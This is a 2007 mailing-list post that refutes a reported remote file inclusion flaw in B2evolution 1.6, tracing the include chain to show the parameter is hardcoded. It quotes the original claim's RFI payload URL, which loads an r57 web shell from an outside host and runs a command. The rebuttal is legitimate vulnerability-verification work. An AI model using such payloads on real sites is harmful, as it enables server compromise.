[VIM] false: B2evolution 1.6 RFi

GM darkfig gmdarkfig at gmail.com
Sun Apr 15 12:47:23 UTC 2007


Link: http://www.securityfocus.com/archive/1/465733/30/0/threaded
Author: k4rtal[at]gmail[dot]com

Quote from the thread:
"script_path/blogs/index.php?core_subdir=http://shelladresi,.com/r57.txt?cmd=id"

Even if there was a vulnerability, RFI is not possible.
And there is no LFI.

index.php:
require_once dirname(__FILE__).'/evocore/_main.inc.php';

_main.inc.php:
require_once dirname(__FILE__).'/../conf/_config.php';

_config.php:
require_once  dirname(__FILE__).'/_advanced.php';

_advanced.php:
$core_subdir = 'evocore/';


More information about the VIM mailing list